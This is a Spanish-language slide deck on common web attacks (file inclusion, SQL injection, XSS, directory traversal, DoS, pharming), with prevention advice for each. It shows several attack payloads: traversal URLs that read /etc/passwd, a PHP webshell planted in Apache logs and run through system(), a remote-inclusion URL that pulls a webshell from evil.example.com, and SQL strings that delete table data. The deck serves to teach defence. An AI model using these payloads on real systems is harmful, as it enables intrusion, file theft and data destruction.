Ataques más comunes. Virginia Armas Alejandro Do Nascimiento



Documentos relacionados
Ataques XSS en Aplicaciones Web

Hacking Ético Web. I Jornadas Tecnológicas CEEPS Carlos García García i52gagac@uco.es

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez

GATEWAYS COMO FIREWALLS

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro antonio@noveria.es

Qué son y cómo combatirlas


S E G U R I D A D E N A P L I C A C I O N E S W E B

Lo que usted necesita saber sobre routers y switches. Conceptos generales.

Detectar y solucionar infecciones en un sitio web

PROGRAMACIÓN PÁGINAS WEB CON PHP

Infraestructura Tecnológica. Sesión 10: Sistemas cortafuego

HOWTO: Cómo configurar SNAT

WINDOWS : TERMINAL SERVER

SEGURIDAD INFORMATICA PHISHING: Definición:

Sophos Computer Security Scan Guía de inicio

Facultad de Ciencias del Hombre y la Naturaleza SISTEMAS OPERATIVOS DE REDES CICLO II Materia: Sistemas Operativos de Redes Tema:

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

Seguridad en un Proveedor de Servicios de Internet (ISP) Ing. Carlos Martínez - Ing. Leonardo Vidal Anteldata.

Firewalls, IPtables y Netfilter

HOWTO: Cómo configurar DNAT para publicar los servicios internos hacia Internet

ARE YOUR WEB VULNERABLE?

RETO FORENSE EPISODIO III Resumen Ejecutivo

Seguridad de la información: ARP Spoofing

DIPLOMADO EN SEGURIDAD INFORMATICA

La utilización de las diferentes aplicaciones o servicios de Internet se lleva a cabo respondiendo al llamado modelo cliente-servidor.

Como crear un túnel entre dos PC s usando el Protocolo SSH

FALSOS ANTIVIRUS Y ANTIESPÍAS

MINT A NIVEL BROSERW CON BEEF

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Q-expeditive Publicación vía Internet

! " " & '( ) ( (( * (+,-.!(/0"" ) 8-*9:!#;9"<!""#

Introducción. Objetivo. Implementar un detector de malware con software libre empleando el protocolo Netflow.

Diego Mauricio Cortés Quiroga

LENGUAJES DE PROGRAMACIÓN WEB (PHP1, HTML52)

La interoperabilidad se consigue mediante la adopción de estándares abiertos. Las organizaciones OASIS y W3C son los comités responsables de la

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS

Qué es el pharming? Cómo se lleva a cabo un ataque de pharming? Pharming

DOCENTES FORMADORES UGEL 03 PRIMARIA

VICEPRESIDENCIA DE OPERACIONES DEPARTAMENTO DE SISTEMAS

Bloquean el tráfico basándose en un esquema de aplicaciones fiables - no fiables.

CURSO DE PROGRAMACIÓN PHP MySQL

Howto: Cómo configurar el mapeo estático de puertos en el router/firewall corporativo para las redes VPN de Panda GateDefender Integra

Dispositivos de Red Hub Switch

Configuración de Aspel-SAE 6.0 para trabajar Remotamente

1. CONSIDERACIONES GENERALES

Internet Information Server

Redes de Computadores I

CIMA. MANUAL DE USUARIO

GUÍA PARA LA INSTALACIÓN DE MOODLE EN UN COMPUTADOR PERSONAL QUE USA EL SISTEMA OPERATIVO MS. WINDOWS

LABORATORIO DE RC: PRÁCTICA 4: IMPLEMENTACIÓN DE UN CLIENTE DE CORREO

Pack Seguridad Autónomos Consola de gestión del programa agente

RESUMEN INFORMATIVO PROGRAMACIÓN DIDÁCTICA CURSO 2013/2014

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Configuración de Aspel-SAE 6.0 para trabajar Remotamente

Instalación y Configuración de un Servidor FTP

Programación páginas web. Servidor (PHP)

Práctica de Seguridad en Redes

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

DISPOSITIVO DE BANDA ANCHA

Capítulo VI. Estudio de Caso de Aplicación del Integrador de Información Desarrollado

F-Secure Anti-Virus for Mac 2015

Semana 10: Fir Fir w e a w lls

Su Seguridad es Nuestro Éxito

Instalación y configuración de Windows SharePoint Services (WSS) 2003

computadoras que tienen este servicio instalado se pueden publicar páginas web tanto local como remotamente.

Manual Básico de Helm 4.2 para Usuarios:

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian

CAPITULO 4 DISEÑO DEL IDS

Novedades en Q-flow 3.02

Instalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta

Configuración de Aspel-SAE 5.0 para trabajar Remotamente

INTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios

Introducción a la Firma Electrónica en MIDAS

Requerimiento Tecnológico para acceso a Sistemas del SIAF

SIEWEB. La intranet corporativa de SIE

MySQL: Guía de Referencia

Instituto Tecnológico de Las Américas (ITLA)

Instalación y Configuración del IIS para la facturación WEB en Aspel-SAE 6.0

GUIA COMPLEMENTARIA PARA EL USUARIO DE AUTOAUDIT. Versión N 02 Fecha: 2011-Febrero Apartado: Archivos Anexos ARCHIVOS ANEXOS

Ataques a Aplicaciones de Bases de Datos

Experiencia 5 : Firewall

OBJETIVOS DE APRENDIZAJE

Iptables, herramienta para controlar el tráfico de un servidor

White Paper Gestión Dinámica de Riesgos

TEMA 3. REDES Y SEGURIDAD INFORMÁTICA

Monitorización de sistemas y servicios

55047 Evaluación posterior al curso

Un sistema adecuadamente refrigerado debe mantener una temperatura de grados.

Para nuestro ejemplo, el caso que se aplica es el del punto b. Los pasos a seguir son los siguientes:

WINDOWS : SERVIDOR DHCP

Curso de PHP con MySQL Gratis

Trabajo 6 ADMINISTRACIÓN REMOTA Y SERVIDOR DE APLICACIONES EN WINDOWS. Jesús Losada - Jesús López - 2º ASIR

HOWTO: Cómo configurar el acceso web en varios interfaces de Integra

Manual de Usuario CPE OX330. Manual de Usuario CPE OX330

Manual de Configuración de Modevasive VenCERT

Seguridad Informática

Capítulo 2.- Vulnerabilidades en aplicaciones web.

CAPÍTULO HTML Y DHCP DE H0/H2-ECOM100 CONFIGURACIÓN. En este capítulo...

Transcripción:

Ataques más comunes Virginia Armas Alejandro Do Nascimiento 1

Introducción Los ataques a desarrollar en la exposición son: HTTP Tunneling Suplantación de contenido Local File Inclusion Remote File Inclusion SQL Injection SSi Injection Directory Traversal Procedimiento Inter-Sitio Denegación de Servicio Pharming 2

HTTP Tunneling Consiste en encapsular tráfico UDP o TCP en encabezados HTTP con la finalidad de evitar los filtros de paquetes y acceder a puertos que normalmente son inaccesibles en las redes. Funcionamiento Cliente encapsula el tráfico en cabeceras HTTP. Se dirige el tráfico hacia un servidor del otro lado del canal de comunicación. El servidor quita el encabezado de encapsulamiento HTTP. Se redireccionan los paquetes a su destino final. 3

Programas de HTTP Tunneling: GNU HTTPtunnel. HTTP Tunneling. Servidor: hts.exe -F (SRC PORT) (TARGET):(DST PORT) Cliente: htc -F (SRC PORT) (TARGET):(DST PORT) Detección Intrusion Detection System Intrusion Detection and Prevention System 4

Suplantación de contenido Explotar un error que se genera de procesar datos inválidos. Se utiliza para introducir código a un programa para cambiar su curso de acción. Muchos consisten en errores de interpretación, en el fallo en no saber distinguir entre las entradas dadas por los usuarios de los comandos del sistema. 5

Tipos de ataques Modificación de base de datos Instalación de malware Escalada de privilegios (root/local System) Robo de sesiones/cookies Prevención Validación de datos de entrada Escapar caracteres peligrosos El uso de API con establecimiento inflexible (strongly typed) de consultas parametrizadas Mínimo de privilegios 6

Local File Inclusion Proceso de incluir archivos ubicados en un servidor introduciendo código a un navegador. Ocurre cuando los include de una pagina no están propiamente trabajados. <?php $file = $_GET['file']; if(isset($file)) { include("pages/$file"); } else { include("index.php"); }?> http://example.com/index.php? file=contactus.php http://example.com/index.php? file=../../../../etc/passwd 7

Evasión de filtros <?php $file = str_replace('../', '', $_GET['file']); if(isset($file)) { include("pages/$file"); } else { include("index.php"); }?> http://example.com/index.php?file=..%2f..%2f..%2f..%2fetc%2fpasswd <?php include/.include($_get['for']..php );?> http://example.com/index.php?file=../../../../etc/passwd%00 8

Otros tipos de inclusiones Archivos Log de servidor apache error_log: http://example.com/<?php+$s=$_get;@chdir($s['x']);echo@system ($s['y'])?> http://example.com/index.php?file=/var/log/apache/logs/error_log %00&x=/&y=uname access_log: Colocar código php en el user-agent Ingresar a la pagina que se va a atacar http://example.com/index.php?file=/var/log/apache/logs/access_lo g%00&x=/&y=uname 9

Remote File Inclusion Vulnerabilidad que se encuentra en las páginas web Permite al atacante incluir archivos remotos Usualmente a través de scripts en el servidor web. Ocurre por no validar propiamente datos introducidos por el usuario 10

<?php $color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; include( $color. '.php' );?> ------------------------------------------------------------------------------------- <form method="get"> <select name="color"> <option value="red">red</option> <option value="blue">blue</option> </select> <input type="submit"> </form> ------------------------------------------------------------------------------------ /vulnerable.php?color=http://evil.example.com/webshell.txt? 11

SQL Injection Insertar una consulta SQL a través de los datos de entrada del cliente a la aplicación. Leer contenido Modificar (Insert/Update/Delete) Ejecutar operaciones de administrador Ocurre cuando: Los datos entran a un programa desde una fuente poco confiable Se utilizan los datos para construir consultas SQL de manera dinámica. 12

string username = ctx.getauthenticatedusername(); string query = "SELECT * FROM items WHERE owner = "'" + username + "' AND itemname = '" + ItemName.Text + "'"; sda = new SqlDataAdapter(query, conn); DataTable dt = new DataTable(); sda.fill(dt); ------------------------------------------------------------------------------------- SELECT * FROM items WHERE owner = AND itemname = ; ------------------------------------------------------------------------------------- Itemname = "name' OR 'a'='a ------------------------------------------------------------------------------------- SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name' OR 'a'='a'; 13

Itemname = name'); DELETE FROM items; --" -------------------------------------------------------------------------------------- SELECT * FROM items WHERE owner = 'hacker' AND itemname = 'name'; DELETE FROM items; --' ------------------------------------------------------------------------------------- Itemname= "name'); DELETE FROM items; SELECT * FROM items WHERE 'a'='a ------------------------------------------------------------------------------------- SELECT * FROM items WHERE owner = 'hacker' AND itemname = 'name'; DELETE FROM items; SELECT * FROM items WHERE 'a'='a'; 14

Prevención Consultas Parametrizadas (Parameterized Queries): $username = $_POST['Username']; $password = $_POST['Password']; $sql = "SELECT * FROM UserTbl WHERE Username = $username' and Password = '$password'"; $stmt = sqlsrv_query($conn, $sql); $sql = "SELECT * FROM UserTbl WHERE Username =? And Password =?"; $params = array($_post['username ], $_POST['Password ]); $stmt = sqlsrv_query($conn, $sql, $params); Procedimientos almacenados (Store Procedures) Utilizar cuentas con el mínimo de privilegios necesitados 15

SSi Injection Server Side Includes es un conjunto de directivas que permite añadir contenido generado de forma dinámica en un sitio web sin tener que programar toda la página web. Consiste en la explotación del servidor donde el atacante envía código a un sitio web que luego será ejecutada localmente por el servidor web. Cómo evitarlo Desactivar la ejecución de SSI si no es necesaria Verificar la presencia de páginas con extensión.stm,.shtm o.shtml. Sin embargo el no tener presente paginas con estas extensiones no significa que la aplicación esta protegida para estos ataques 16

Directory (Path) Traversal Se encarga de explotar las vulnerabilidades de los directorios de un equipo para acceder a archivos o directorios que no deben ser visitados. El ejemplo mas común es el uso de la secuencia de caracteres../ (Unix) y..\ (Windows) para modificar la ubicación de una solicitud. El objetivo del atacante es tener acceso a archivos ubicados en el servidor web mediante el uso del punto punto barra. 17

Directory Traversal 18

Directory Traversal Cómo evitarlo Instalación de actualizaciones del software Uso de escanners de vulnerabilidad Algunas aplicaciones hacen escaneos sobre las cadenas introducidas buscando cadenas como..,../ o..\ Escoger no trabajar con intervenciones del usuario al utilizar llamadas al sistema Las aplicaciones web pueden filtrar y validar todas las entradas 19

Procedimiento Inter-Sitio Se conoce por las siglas XSS por su nombre en inglés: Cross- Site Scripting El ataque consiste en que el navegador ejecuta el script malicioso en el contexto de seguridad del cliente. Una vez ejecutado, el atacante tiene acceso a la información de la víctima. Por esto recibe el nombre Cross-Site Scripting, ya que una fuente esta inyectando código dentro de las páginas enviadas por otra fuente (confiable). 20

Procedimiento Inter-Sitio Cómo funciona Primero el atacante selecciona un sitio Web Luego atrae a la víctima para que interactué con el atacante, ya sea por correo o con un contenido interesante en una página web, El atacante puede ahora re direccionar la solicitud del navegador y realizar la inserción del script malicioso. El browser ejecuta el script de una fuente no confiable como si proviniera de una confiable. Si el atacante puede además capturar o recibir información introducida por el usuario 21

Procedimiento Inter-Sitio Ejemplo Un atacante puede generar un enlace malicioso como el siguiente: <A HREF= Http://ejemplo.com/comment.cgi? mycomment = <SCRIPT> código malicioso </SCRIPT> > Click Here </A> 22

Procedimiento Inter-Sitio Cómo evitarlo y recuperarse Los usuarios Web pueden reducir el riesgo de dos maneras: Deshabilitar los lenguajes de script en el browser Ser selectivos al momento de visitar los sitios web para mantener bajo el riesgo. Los desarrolladores y administradores de páginas web pueden prevenirlo asegurándose que las páginas dinámicas no contengan etiquetas no deseadas o entradas no confiables. Si un usuario sospecha que esta siendo atacado por un script malicioso, debe cerrar el browser y abrir uno nuevo en un sitio web conocido para así borrar todos los archivos Cookies del computador. 23

Denegacíon de Servicio DoS La Denegación de Servicio (Denial Of Service) consiste en atacar equipos o redes informáticas para impedir que puedan ofrecer sus servicios a los clientes y usuarios. El atacante oculta su verdadera dirección usando técnicas como el IP Spoofing 24

DoS Cómo funciona Para lograrlo se tienen varias maneras: Connection Flood Smurf Ejecutar actividades para producir un gran consumo de los recursos de la máquina afectada provocando así una caída en el rendimiento Transmisión de paquetes de datos que incumplan las reglas de un protocolo Proporcionar mediante routers información falsa sobre tablas de enrutamiento Envío masivo de mensajes de correo electrónico 25

DoS Cómo evitarlo y recuperarse Debido a la diversidad de los tipos de ataques para lograr una denegación de servicio, se tienen diferentes métodos, algunos son: Cortafuegos (firewall) Adquirir gran cantidad de ancho de banda El uso de tecnologías de regulación y limitación de velocidad puede ayudar a reducir los efectos de un ataque DoS. Limitar de 5 a 10 el número de conexiones realizadas por segundo. Bloquear/Ignorar temporal o definitivamente las direcciones IP identificadas como posibles atacantes. 26

Denegación de Servicio Distribuidos (DDoS) Se llevan a cabo en equipos zombies Los usuarios maliciosos coordinan ataques en los que pueden llegar a intervenir hasta miles de computadoras sin que sus propietarios lo sepan para colapsar redes y servidores objetivos de los atacantes. Para prevenir esto es necesario la colaboración de los proveedores de servicio de internet para filtrar o limitar el trafico procedente de los equipos que participan en el ataque. 27

Pharming La intención es redirigir el tráfico de un sitio web hacia otro sitio web falso. Se puede realizar ya sea cambiando archivos en el equipo de la víctima o aprovechándose de la vulnerabilidad en el software del servidor DNS. Es uno de los más peligrosos y dificil de controlar hoy en día. Básicamente consiste en redirigir el nombre de dominio de un sitio web de confianza a otro sitio web, que en apariencia es idéntica pero que en realidad ha sido creada por el atacante para tener acceso a los datos privados del usuario. 28

Pharming Cómo evitarlo y recuperarse Cambiar la clave por defecto del router Uso de software especializado No abrir correos electrónicos no solicitados Protección DNS Si se sospecha de que se fue victima de un pharming, una opción es resetear el router para así resetear los valores del DNS 29

Bibliografía http://www.symantec.com/connect/articles/data-drivenattacks-using-http-tunneling https://www.owasp.org/index.php/category:attack http://en.wikipedia.org/wiki/remote_file_inclusion http://www.net-security.org/article.php?id=1176&p=2 http://hakipedia.com/index.php/local_file_inclusion http://www.windowsecurity.com/articles/http-tunnels.html http://downloads.ackack.net/localfileinclusion.pdf 30